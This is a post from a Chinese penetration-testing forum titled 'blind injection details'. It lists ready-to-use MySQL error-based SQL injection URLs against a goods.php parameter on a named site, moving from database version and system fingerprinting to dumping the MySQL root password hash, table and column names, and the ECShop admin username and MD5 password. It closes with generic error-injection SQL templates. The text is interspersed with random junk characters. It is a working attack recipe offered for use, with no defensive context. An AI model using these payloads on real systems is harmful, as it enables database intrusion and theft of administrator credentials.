找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 3067|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 ) E) l  _; }2 N3 x5 A
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& n; ]  L' B. [! R1 E0 t' t) B5 I; Q4 [) G3 X+ a9 e) H8 }7 r
判断系统2 b% ?; @, s: m* z: {  q$ `
3 j! C! q6 p) g
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 S# y- }0 i* }4 S* z8 j

. L1 F* X3 N" F) D8 {' w, Z6 r! e/ v. }1 J& @

/ y1 ]5 o8 I7 Q8 X8 G9 n& m  ^2 k当前 user()) N- o, ]! B2 U  y3 d- w
6 F! Q; m! i: b8 n4 P  K; V( _/ j
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( F( d5 N9 m& Y7 R, s+ H% c4 M
6 s3 |# S1 R( ?$ U3 n
! q5 _' E0 ^0 @/ w
3 k1 A$ O5 m3 G3 m9 _当前 database()/ K2 W1 a& C) G& A# L9 ]
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) ?7 w  N: o* g* y$ X. Y- H

  t, W- F/ @- H  j# R
0 ^, z) I# C  W/ \/ V* x- v! [4 ?0 e9 p( }# o7 K. h: H4 m" y# b+ o
3 w2 I: h2 p2 \. F. u
root hash9 u+ Y  m) P+ W& j
+ _- \+ _4 i7 @: I: k$ f
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23/ K# ^) k; |8 Z! U! M" v; s
% Q' H( e/ G, [

, K* H( T* ?! v/ ?0 x/ A& H& {% ^. R4 T0 g% J2 [
当前 数据库表名
% J8 i5 P) [6 F6 b
. v+ h+ g7 M9 J( F; `' o- j5 Y" Dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. |5 ^$ U. W5 o1 ]- w5 a1 y
1 C# D! i5 ^0 @, D
( w, y; J$ I2 A, P, ^( s; A' `( L' F3 h
0 v, y" Z9 w' i! ]3 `; |: e当前 数据库 user_name 字段' t6 K7 Q% P2 a% Z
  r0 v( V) l# [% R
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% n* z. ?1 J: [# l* f; ^; ]
/ `* b$ i0 g* M& K: e$ L
当前 数据库 字段 password7 O* r3 I2 E+ c/ }" ^3 K
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
: z+ v, {* @* X6 h, U  g3 a2 i. h3 _. q6 M* y- J* [/ f

. _. N' X5 Q8 K' [8 d, K2 h+ c# F1 _5 w# b1 B5 Y3 S
获得 admin passwd(md5)
  }% K0 R! Q9 ]  l. \& u: M% I5 x& l8 E5 y  F* L4 G  N& v" p" w

/ @$ j1 \: d9 b- D: X. O. ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ A, {6 S9 ^( b6 n/ c4 c! ?# ]" c8 j8 N6 H# B( ]
报错注射: R+ j8 Q3 O# {, }5 Y8 A
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)0 ^% i7 N* G% f+ K( S5 g  R

; o/ o7 S/ n9 g$ r6 rSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
% i& ^7 O0 f5 i! Q" T, A6 N+ N+ u7 G8 N7 [
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表